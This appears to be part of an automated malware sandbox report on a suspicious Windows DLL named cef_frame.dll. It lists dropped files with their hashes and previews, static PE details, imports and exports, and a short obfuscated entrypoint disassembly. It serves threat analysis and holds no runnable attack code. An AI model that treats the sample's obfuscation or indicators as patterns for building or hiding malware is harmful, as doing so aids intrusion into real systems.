                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4658
                              Entropy (8bit):4.4752261499225225
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseJg77aI9n0WpW8VYmYm8M4JCdP5Iq1FU+q8/LnEqs1GScSQd:uIjfUI7Jt7V6JWIqEcEqs1J3Qd
                              MD5:5C09CBCB58E270E8F1A9ADC524BEB7CD
                              SHA1:F361A2E13A776366B11F439D07B0DC3A57740851
                              SHA-256:F693F6E13CFCBBED71F420DE7413B8E194E1B5EDF03D4B413D9FB1DD436126F1
                              SHA-512:62FBBC6EEBF26F895243324EC50E62F862940373E7F8B13C98B43A273546C125E497B82E96665D9743B5AEFA5ED75030EB27F271D8CAD966FD290A8BDEBCAFF1
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCF25.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:38:23 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):46240
                              Entropy (8bit):2.040508208045382
                              Encrypted:false
                              SSDEEP:192:SEJC8czkTXKaxypO5H4u3OnKXcm58e3UQ:FCAMs5H/+Yj5ZU
                              MD5:690672D8787385B5C3E774F41A345F54
                              SHA1:281DA3DF512F5AC4CD0426D422C36146254E43A9
                              SHA-256:58C375941F0F7AAA27DA01A1851F998D573218111BA384BCD049D1C37F1E5431
                              SHA-512:B8EFCD3780CE28FB5EE1B04AF352D3A11D781719E74EB26F1E53777F16C175D1E0787F870F2C36E37A1653D461D05EE34A661818BF350180B7DF9DAE98B3494F
                              Malicious:false
                              Preview:MDMP..a..... ..........g........................`................1..........T.......8...........T.......................................................................................................................eJ....... ......GenuineIntel............T..............g.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFC2.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8294
                              Entropy (8bit):3.695566885705297
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJqU6gyJfT6YyE69ggmfT/YXprT89b4p95sfuIm:R6lXJx6TJfT6YJ69ggmfT/Y+4p9Sf4
                              MD5:9B0BA687FED53791CD6D92C7B22D48CA
                              SHA1:983A6A80A1774D8E819C12BEC3224142B2E17EE4
                              SHA-256:7ADDDFCA6BA78B1330E0E9FB0719A058BA7D48BE62D5259D17E89437D071280F
                              SHA-512:2A2D4ECA72E07792B656E03D2979C4756208B7F33C997A54FBE3C01C87333A09322B5E9CD8A678B55E489C3CDF1A8CE49C8B4A53A5A56F86DF7C0679EF849584
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.3.2.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFE2.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4648
                              Entropy (8bit):4.459729397780003
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zs1Jg77aI9n0WpW8VYKYm8M4JCdP5a6FFFOJ+q8/LOZsGScSbd:uIjfPI7Jt7VCJv+J3bd
                              MD5:6DE36B04E10EE5E37B276BB495D30511
                              SHA1:51CBC366005497A315C265CE679950CCD15B10F2
                              SHA-256:4C239A28F2A7AC874229D6893C5617DEA7CDC7AEE380B8508BFB6D3A559EC001
                              SHA-512:40875097E1AACC4E3E128CBB57C9EFD326502FE5ABFD4E95C028A2BD6606FA6B3F217806B9275A83CC763544E03DF1755C7F2AD10519E940B524AFA303F8D6D4
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677441" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE7E2.tmp.dmp

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:37:24 2025, 0x1205a4 type
                              Category:dropped
                              Size (bytes):50516
                              Entropy (8bit):2.0315752546613277
                              Encrypted:false
                              SSDEEP:192:pGVswr9Z4jXL3GzO5H4O30naoYo5QcerZsyaw9WPpJh3G9yl:Va0P5HPknaQKcerZZaw9EJ9kg
                              MD5:3CE33067838E0D73EC5E48F06BC99894
                              SHA1:62DA4E96D3D146AB78CB7BA579E32F829820750D
                              SHA-256:0C37C079EA565982F05896329B4247D36BBDA51BBEF39A0A335805D1669C4EB4
                              SHA-512:D33C7D2912FB6EB4A6D58DA105549A2356790117D6B39E34E47EC8C64BEE5A48056D23FB4A312EAF77C0B67AAB70968D76BA1EA96B20BEDF5FDE93E06C7C3296
                              Malicious:false
                              Preview:MDMP..a..... .......t..g........................`................4..........T.......8...........T..........................,............ ..............................................................................eJ....... ......GenuineIntel............T...........\..g.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE91B.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8322
                              Entropy (8bit):3.694986742148596
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJnMO6o6YCZ68gmfT/YXpre89bYYsfxQIm:R6lXJt6o6YE68gmfT/Y9YLf8
                              MD5:49854B6C8F99EEC298D93DABB08FADC7
                              SHA1:509B89395F431AFB826980F8A60E09FD91D5130D
                              SHA-256:78BDFB2576C8004C8BD604DFE9AE97F548B6973584137A507584D5873F105905
                              SHA-512:E4A6C05013612B19499E33D3EE359F5B14071071C98B71AE0374E992DC47E5B09B10D69640B0D3E99822CE5F96DEAB33D97E957FAD946591171298BD400A74A8
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.<./.P.i.d.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE9B8.tmp.xml

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4648
                              Entropy (8bit):4.460434734525578
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseJg77aI9n0WpW8VYXYm8M4JCdP5a6FbP+q8/LOZxGScSid:uIjfUI7Jt7VDJoPfJ3id
                              MD5:B7C483E964270609B150D125AD936FA6
                              SHA1:2CA5DFA1C51D91DFF3485B01FE91B4BDA6DBF6F0
                              SHA-256:8168D5E4D689B58E1FA9711B6A980610F72CD447F425FD189E0E23E85056CD1B
                              SHA-512:AC2A6148318DF9DAFDA7826FE149BB0202EA39A2B9D2AEE4DE301EE543A1820D9AA8826D27C73DEF6F4240FE10C6B89CE40889DE10F0997CB80B104376DBC7FA
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\Users\user\AppData\Local\632922

                              Download File
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):32
                              Entropy (8bit):4.351409765557392
                              Encrypted:false
                              SSDEEP:3:1EypyREcuv:1XpyyTv
                              MD5:E7621EF73EF6B46018946DC34EE3653E
                              SHA1:33B9ACE89DA64A0F1E6D974BB76C454A5D639DF0
                              SHA-256:E455E140237A6A3F2B5D0A4C98C12BEA4DF98CCB2EEECB359BFAA41ABFE49546
                              SHA-512:07396ADCE8D19AA2358C0F5979F0E8BBE448496F556DDAD4C326EAF1D3EB182D0B901058B965904088BDD270CAC449E6A06145AEAAF2F80C36950066978E88A2
                              Malicious:false
                              Preview:[Generate Pasta]..mHazIynKcSqV..

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\errorPageStrings[1]

                              Download File
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:modified
                              Size (bytes):4722
                              Entropy (8bit):5.16192639844512
                              Encrypted:false
                              SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g5O8b7A9I5:JsUOG1yNlX6ZzWpHOo/iP16CbM1k
                              MD5:387B4FC78ABB97F378C5299D4D2CE305
                              SHA1:6F2995FC620AB520C9EE1CA7244DF57367F983A2
                              SHA-256:030209A13E2C84118139ABF0C4F08DBD203B4C802C7B73B74851860D79DF9CB7
                              SHA-512:592D5E3FB7C78420F648281D87B0B303773749B8E0D3621A493ACAE257E2C1E77B782F3D6DAA0C2B3D37CBB4865B382617AF744E34F66C0F3E522DBCA7D71AAE
                              Malicious:false
                              Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dnserrordiagoff[1]

                              Download File
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1681
                              Entropy (8bit):4.567538112791388
                              Encrypted:false
                              SSDEEP:24:rC7cWhfs5mVM4mVMyIjmgAV28EFP8hRqh/k+CkE03vjqX:u7o5V4VtihV2lFUWlEqvj6
                              MD5:C74D57042D3614B92F2E0AF783ACD5DE
                              SHA1:415F8A0F5DBD61D622724034C182C0B15E80CD20
                              SHA-256:05182A8C3A558E671705B8A8421712A9715A1D597606E3710A6D6CFEB00FB462
                              SHA-512:F33BC2CDA990B07FE8EA37A1F68DDDBF5FA9A67CA028019EA4D848B70CC6410D1468E0CE8F8132665124F6E4B8438AFFC41FB562D9E4A1401498E46CD0D1A0EC
                              Malicious:false
                              Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\NewErrorPageTemplate[1]

                              Download File
                              Process:C:\Windows\SysWOW64\rundll32.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1612
                              Entropy (8bit):4.869554560514657
                              Encrypted:false
                              SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                              MD5:DFEABDE84792228093A5A270352395B6
                              SHA1:E41258C9576721025926326F76063C2305586F76
                              SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                              SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                              Malicious:false
                              Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                              C:\Windows\appcompat\Programs\Amcache.hve

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.469391073562723
                              Encrypted:false
                              SSDEEP:6144:TzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNFjDH5S:vZHtYZWOKnMM6bFpHj4
                              MD5:653775A6AAC073540F21A48771AE872B
                              SHA1:4F64945F1402DF0F6D2A0AB6FF723171921FFC43
                              SHA-256:032CC87B3C5FB6405A91AD09DAF7902F7F1374464AE11728001F661F6807AE10
                              SHA-512:99E1F5DDE9D3C24C3321684AEA4482D0E287CE6D918505A4FE45567DEFD53AC5D3FD32961B3E89362AAA9BEE5565A84E3E57BA1FBD77BA5996F7BA1E811EC574
                              Malicious:false
                              Preview:regfM...M....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....g..............................................................................................................................................................................................................................................................................................................................................(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.960944638650986
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:cef_frame.dll
                              File size:22'631'424 bytes
                              MD5:a03c075ec2d02a406712ecbc828ca98e
                              SHA1:8f2b6a37800de2bc944e3d687bfd73754e550681
                              SHA256:32530abfeaeaefebdf0715fd098104671d716bb02d609197bef67c7f4b8b0e8d
                              SHA512:b1ffd8c6e78266afe95f310dd3ec3f7e3fc0542559ab572509a1817174195929c9d5579600f03738a83e3a17dc898691ad4ae91d96e3a8c90f8ef0807df0002d
                              SSDEEP:393216:Ax/MizKyPRc0TCzzO2fqnyVn9SrNoVfImFIBGI722jhasu1/lwM1ViakY:Ax/MizKyPRZCuiVQMfpGBGorQwTaH
                              TLSH:3037339D3DDB01E1D9C209B2D7273BEB13F3229A45DA883579C136C6B0E2F76502E946
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L.....{g..................A...9......3........B...@...........................g......................................Z.....

                              File Icon

                              Icon Hash:7ae282899bbab082

                              Static PE Info

                              General

                              Entrypoint:0x359331c
                              Entrypoint Section:.z}'
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
                              DLL Characteristics:
                              Time Stamp:0x677BFBEA [Mon Jan 6 15:51:06 2025 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:0a1abf9db61b744799e83fff23b7e0dd

                              Entrypoint Preview

                              Instruction
                              push esi
                              pushfd
                              mov esi, AE86A820h
                              add esi, FE30E9ADh
                              push ecx
                              not esi
                              mov ecx, 8CA5CF3Eh
                              or esi, B2A437B1h
                              mov esi, dword ptr [esp+ecx+735A30CAh]
                              mov dword ptr [esp+08h], 42126F76h
                              mov ecx, dword ptr [esp+ecx+735A30C2h]
                              call 00007FF4AF584403h
                              mov dword ptr [esi-04h], edx
                              movzx ecx, ax
                              xchg dword ptr [esp+ecx*4-000160D8h], ecx
                              movzx eax, byte ptr [ecx+edi-00A40202h]
                              lea edx, dword ptr [ecx+ecx*8-1AF24AC2h]
                              sal ecx, cl
                              btr ecx, FFFFFF9Ah
                              xor al, bl
                              or word ptr [esp+ecx*4-0A402020h], dx
                              adc dword ptr [esp+ecx-02900808h], ecx
                              sbb word ptr [esp+ecx*2-0520100Fh], dx
                              not al
                              shr dl, FFFFFF86h
                              shl ecx, cl
                              rol al, 1
                              lea ecx, dword ptr [B5AC8196h+edx*8]
                              bt edx, edx
                              sbb al, dl
                              or byte ptr [esp+ecx*4-30EAE675h], cl
                              xor al, dl
                              rol al, 1
                              bts dx, dx
                              dec dx
                              and dx, 1F24h
                              xor bl, al
                              add ecx, E0A5A424h
                              adc cl, FFFFFF89h
                              sbb cl, dl
                              mov cx, ax
                              mov eax, dword ptr [esp+00h]
                              jno 00007FF4B04259B2h
                              inc ecx
                              pop ebx
                              inc edx
                              lea ebx, dword ptr [ebx+esi*4-3C80ACA1h]
                              inc ecx
                              movzx ecx, cx
                              bswap ebx

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x30a5a880xb4.z}'
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3107b240x140.z}'
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x367a0000x258.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x367b0000x7d8.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20e40000x7c.< a
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3320c000x1c0.z}'
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x41cba80x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .itext0x41e0000x2c380x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .data0x4210000x119240x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .bss0x4330000x7a5c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata0x43b0000x3b1e0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .didata0x43f0000xc680x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .edata0x4400000xb40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rdata0x4410000x450x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .E{70x4420000x1ca1b030x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .< a0x20e40000x940x2005164c24cf8c47990102f1092b446c7b2False0.171875data1.165861165884647IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .z}'0x20e50000x15940500x1594200d1fd3841a4b8fc8da1247598162d8adaunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0x367a0000x2580x400bbac6bcd485a3e1597cf38c6b86ceb8cFalse0.279296875data2.0648926286113696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x367b0000x7d80x800f4979961f85044534355d077a8a111eaFalse0.49365234375data4.448328956654729IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0x367a0580x200Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970EnglishUnited States0.47265625

                              Imports

                              DLLImport
                              shlwapi.dllSHCreateStreamOnFileW
                              winspool.drvDocumentPropertiesW
                              comctl32.dllImageList_GetImageInfo
                              shell32.dllSHGetFolderPathW
                              user32.dllMoveWindow
                              version.dllGetFileVersionInfoSizeW
                              oleaut32.dllSafeArrayPutElement
                              advapi32.dllRegSetValueExW
                              netapi32.dllNetWkstaGetInfo
                              msvcrt.dllmemcpy
                              kernel32.dllGetVersion, GetVersionExW
                              wsock32.dllgethostbyaddr
                              ole32.dllOleRegEnumVerbs
                              gdi32.dllPie
                              Magnification.dllMagSetWindowSource

                              Exports

                              NameOrdinalAddress
                              TMethodImplementationIntercept30x46dc0c
                              TbsAppInstance40x80f4d0
                              __dbk_fcall_wrapper20x412114
                              dbkFCallWrapperAddr10x836640

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

